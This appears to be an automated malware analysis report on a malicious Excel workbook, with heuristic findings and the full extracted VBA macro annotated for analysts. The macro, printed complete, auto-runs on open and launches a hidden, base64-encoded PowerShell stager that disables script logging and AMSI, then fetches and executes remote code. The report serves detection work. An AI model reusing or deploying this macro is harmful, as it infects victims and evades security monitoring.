Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d17dcbfdf1b0b5c7…

MALICIOUS

Office (OOXML)

18.4 KB · Created: 2021-06-12 10:29:04 UTC · Authoring application: Microsoft Excel 16.0300 · First seen: 2021-06-17
MD5: 15c2fc97329b3918d7331a3b3363b1c7 SHA-1: 7c8786e9f3e3a624d5c56d19c1f9656fceacb469 SHA-256: d17dcbfdf1b0b5c7dbf62074d4af78f5593cbc32c945e1b65785992945a61802
Risk Score: 228

Heuristics 6

  • VBA project inside OOXML — medium — 5 related findings — OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage — critical — OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
            od = od + "AEUAWAA="
            Set asd = CreateObject("WScript.Shell")
            asd.Run (od)
  • PowerShell reference in VBA — critical — OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
            Dim od As String
            od = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
            od = od + "BlAFIAcwBJAG8ATgBUAGEAYgBsAGUALgBQAFMAVgBFAFIAcwBJ"
  • CreateObject call — high — OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
            od = od + "AEUAWAA="
            Set asd = CreateObject("WScript.Shell")
            asd.Run (od)
  • VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro — low — OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Attribute VB_Name = "Module1"
    Sub Auto_Open()
            JK

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename — Kind — Source — Size
macros.bas — vba-macro — oletools.olevba.extract_macros (decoded VBA source from OOXML) — 8193 bytes
SHA-256: 04994da59d505afa1a67f6a0930547eee8fd9b9f6e91a60f7782dfa4b371f996
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' Auto_Open is one of the legacy auto-execution names Excel honours: it runs when the
' workbook is opened and macros are enabled (see the OLE_VBA_AUTO finding above).
' The only thing it does is call JK, which builds and launches the PowerShell command.
Sub Auto_Open()
        JK
End Sub

' Builds a single PowerShell command line in `od` and launches it through WScript.Shell.
' Called from Auto_Open, so it fires on workbook open once macros are enabled.
' Nothing is ever assigned to JK, so the function returns Empty; the caller discards it.
Public Function JK() As Variant
        ' Command-line switches: -noP (NoProfile), -sta (single-threaded apartment),
        ' -w 1 (WindowStyle Hidden, i.e. no visible console) and -enc (EncodedCommand,
        ' base64 of UTF-16LE script text). The double space after "-enc" on the next
        ' line is part of the literal and is a usable fingerprint for this builder.
        Dim od As String
        od = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
        ' The encoded payload is split into ~50-character fragments and reassembled at
        ' run time, presumably to defeat naive string matching on the VBA source.
        ' The repeating "A" pattern in the base64 is characteristic of UTF-16LE text.
        ' NOTE(review): decoded by hand from the visible fragments — the opening decodes to
        ' `If($PSVeRsIoNTable.PSVERsIoN.MAJOr -Ge 3){`, and later fragments contain
        ' 'ScriptB'+'lockLogging', 'Amsi'+'Utils', 'amsiInitF'+'ailed', System.Net.WebClient
        ' and a trailing `|IEX`, consistent with a PowerShell Empire-style stager that
        ' tampers with script-block logging and AMSI before fetching a second stage.
        ' Decode the full blob offline and confirm before citing any of this as an IoC.
        od = od + "BlAFIAcwBJAG8ATgBUAGEAYgBsAGUALgBQAFMAVgBFAFIAcwBJ"
        od = od + "AE8AbgAuAE0AQQBKAE8AcgAgAC0ARwBlACAAMwApAHsAJAA2AD"
        od = od + "cARQA9AFsAcgBlAGYAXQAuAEEAUwBzAEUAbQBiAEwAWQAuAEcA"
        od = od + "ZQBUAFQAWQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQ"
        od = od + "BnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBV"
        od = od + "AHQAaQBsAHMAJwApAC4AIgBHAGUAdABGAGkAZQBgAEwARAAiAC"
        od = od + "gAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkA"
        od = od + "UwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQ"
        od = od + "BiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJAA2"
        od = od + "ADcARQApAHsAJAA4ADkAYgA9ACQANgA3AEUALgBHAEUAVABWAG"
        od = od + "EATABVAEUAKAAkAG4AdQBsAGwAKQA7AEkARgAoACQAOAA5AGIA"
        od = od + "WwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZw"
        od = od + "BnAGkAbgBnACcAXQApAHsAJAA4ADkAYgBbACcAUwBjAHIAaQBw"
        od = od + "AHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAF"
        od = od + "sAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwA"
        od = od + "bwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA4ADkAQg"
        od = od + "BbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBn"
        od = od + "AGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAH"
        od = od + "AAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8A"
        od = od + "ZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAG8ATA"
        od = od + "BMAGUAYwBUAGkAbwBuAFMALgBHAGUATgBlAHIAaQBDAC4ARABJ"
        od = od + "AEMAdABJAE8AbgBBAHIAeQBbAHMAdAByAGkAbgBnACwAUwBZAH"
        od = od + "MAVABlAE0ALgBPAEIAagBlAEMAdABdAF0AOgA6AE4ARQBXACgA"
        od = od + "KQA7ACQAVgBBAGwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUw"
        od = od + "BjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBu"
        od = od + "AGcAJwAsADAAKQA7ACQAVgBBAEwALgBBAEQARAAoACcARQBuAG"
        od = od + "EAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8A"
        od = od + "YwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJA"
        od = od + "A4ADkAYgBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBD"
        od = od + "AEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAG"
        od = od + "MAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQA"
        od = od + "bwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQ"
        od = od + "BwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBd"
        od = od + "AD0AJABWAEEATAB9AEUAbABTAGUAewBbAFMAYwByAGkAUABUAE"
        od = od + "IAbABPAGMAawBdAC4AIgBHAEUAVABGAEkAZQBgAEwARAAiACgA"
        od = od + "JwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbw"
        od = od + "BuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBl"
        od = od + "AFQAVgBBAGwAdQBFACgAJABuAFUATABsACwAKABOAGUAdwAtAE"
        od = od + "8AQgBqAGUAQwBUACAAQwBvAGwATABlAGMAVABJAG8ATgBzAC4A"
        od = od + "RwBlAE4ARQBSAEkAQwAuAEgAQQBTAEgAUwBlAHQAWwBzAHQAcg"
        od = od + "BJAE4AZwBdACkAKQB9ACQAUgBFAGYAPQBbAFIARQBGAF0ALgBB"
        od = od + "AHMAUwBFAE0AQgBsAHkALgBHAGUAVABUAHkAcABlACgAJwBTAH"
        od = od + "kAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUA"
        od = od + "dABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQ"
        od = od + "BsAHMAJwApADsAJABSAEUAZgAuAEcARQB0AEYAaQBlAGwARAAo"
        od = od + "ACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkAC"
        od = od + "cALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMA"
        od = od + "JwApAC4AUwBFAHQAVgBhAEwAdQBlACgAJABuAHUAbABMACwAJA"
        od = od + "B0AHIAdQBFACkAOwB9ADsAWwBTAFkAUwB0AGUATQAuAE4ARQBU"
        od = od + "AC4AUwBFAFIAdgBJAGMAZQBQAE8AaQBuAFQATQBhAG4AQQBHAE"
        od = od + "UAUgBdADoAOgBFAFgAUABlAGMAdAAxADAAMABDAE8AbgBUAEkA"
        od = od + "bgB1AGUAPQAwADsAJABlAGMAQgA9AE4AZQB3AC0ATwBCAGoAZQ"
        od = od + "BjAFQAIABTAHkAcwBUAEUAbQAuAE4ARQB0AC4AVwBFAGIAQwBs"
        od = od + "AEkARQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC"
        od = od + "4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsA"
        od = od + "IABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMA"
        od = od + "A7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBj"
        od = od + "AGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAG"
        od = od + "4AQwBPAEQAaQBOAGcAXQA6ADoAVQBuAEkAQwBPAEQARQAuAEcA"
        od = od + "RQBUAFMAdABSAEkATgBnACgAWwBDAG8ATgBWAEUAcgB0AF0AOg"
        od = od + "A6AEYAcgBvAE0AQgBhAHMARQA2ADQAUwBUAFIAaQBOAEcAKAAn"
        od = od + "AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AE"
        od = od + "EAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBOAGcAQQA0AEEA"
        od = od + "QwA0AEEATQBRAEEAdwBBAEMANABBAE4AQQBBADQAQQBEAG8AQQ"
        od = od + "BPAEEAQQA0AEEARABnAEEATwBBAEEAPQAnACkAKQApADsAJAB0"
        od = od + "AD0AJwAvAGwAbwBnAGkAbgAvAHAAcgBvAGMAZQBzAHMALgBwAG"
        od = od + "gAcAAnADsAJABlAEMAYgAuAEgAZQBBAGQAZQByAFMALgBBAGQA"
        od = od + "RAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOw"
        od = od + "AkAGUAQwBCAC4AUAByAG8AeAB5AD0AWwBTAFkAUwB0AGUATQAu"
        od = od + "AE4AZQB0AC4AVwBlAEIAUgBlAHEAVQBlAFMAdABdADoAOgBEAE"
        od = od + "UARgBhAHUAbAB0AFcARQBiAFAAcgBvAHgAWQA7ACQAZQBjAGIA"
        od = od + "LgBQAHIATwBYAFkALgBDAFIARQBkAEUATgB0AEkAYQBsAHMAIA"
        od = od + "A9ACAAWwBTAHkAUwB0AGUATQAuAE4AZQB0AC4AQwBSAEUARABl"
        od = od + "AE4AdABJAGEAbABDAEEAQwBoAEUAXQA6ADoARABlAGYAYQB1AG"
        od = od + "wAVABOAEUAVABXAE8AcgBrAEMAUgBlAGQAZQBOAFQAaQBhAEwA"
        od = od + "cwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJA"
        od = od + "BlAGMAYgAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AHMAdABF"
        od = od + "AE0ALgBUAGUAWABUAC4ARQBuAEMAbwBkAGkAbgBHAF0AOgA6AE"
        od = od + "EAUwBDAEkASQAuAEcARQBUAEIAWQBUAEUAUwAoACcAZABDAFMA"
        od = od + "RABoACkAZQBHADMAdAB5AD8AcgB6AHgATwBZAGsAdwBCACwAYg"
        od = od + "BQAEEAMgB7AFgAagBMAGcALQBpACcAKQA7ACQAUgA9AHsAJABE"
        od = od + "ACwAJABLAD0AJABBAHIARwBzADsAJABTAD0AMAAuAC4AMgA1AD"
        od = od + "UAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQA"
        od = od + "UwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBPAFUATg"
        od = od + "BUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAk"
        od = od + "AEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7AC"
        od = od + "QARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsA"
        od = od + "JABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOw"
        od = od + "AkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABI"
        od = od + "AF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAF"
        od = od + "sAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUA"
        od = od + "NgBdAH0AfQA7ACQARQBDAEIALgBIAGUAYQBEAEUAcgBzAC4AQQ"
        od = od + "BEAEQAKAAiAEMAbwBvAGsAaQBlACIALAAiAFUASwBCAGcASwBy"
        od = od + "AG4AWQBOAE4APQBLAFAASgB0ADcAOQB6AG8AagB5AHIALwBpAD"
        od = od + "kAagBiAHMAMwBWAGYAZQA2ADUAZAA3AGIAbwA9ACIAKQA7ACQA"
        od = od + "RABhAHQAQQA9ACQAZQBjAEIALgBEAE8AdwBOAGwAbwBBAGQARA"
        od = od + "BBAFQAQQAoACQAUwBlAHIAKwAkAFQAKQA7ACQASQB2AD0AJABk"
        od = od + "AGEAVABhAFsAMAAuAC4AMwBdADsAJABkAEEAdABBAD0AJABEAG"
        od = od + "EAVABBAFsANAAuAC4AJABkAGEAVABhAC4ATABlAE4AZwBUAEgA"
        od = od + "XQA7AC0AagBPAGkATgBbAEMASABhAHIAWwBdAF0AKAAmACAAJA"
        od = od + "BSACAAJABkAEEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJ"
        od = od + "AEUAWAA="
        ' `asd` is never declared (no Option Explicit in the module), so it is a late-bound
        ' Variant holding the WScript.Shell COM object. .Run spawns the assembled command
        ' as a child of the Office host process (typically EXCEL.EXE -> powershell.exe),
        ' which is the parent/child relationship to hunt for; Run's return value and any
        ' error are ignored, so the macro gives no feedback whether the launch succeeded.
        Set asd = CreateObject("WScript.Shell")
        asd.Run (od)
End Function


Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' ThisWorkbook document module: only the standard exported attribute header was
' recovered; no procedures (e.g. Workbook_Open) follow it in the extraction.

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Sheet1 document module: attribute header only, no procedures were extracted.
' All executable logic lives in Module1 (Auto_Open -> JK).
vbaProject_00.bin — vba-project — OOXML VBA project: xl/vbaProject.bin — 25088 bytes
SHA-256: bf63cac8fc7ebe3c946468a7cdb80b15e036f671244f37a803d18f103012d323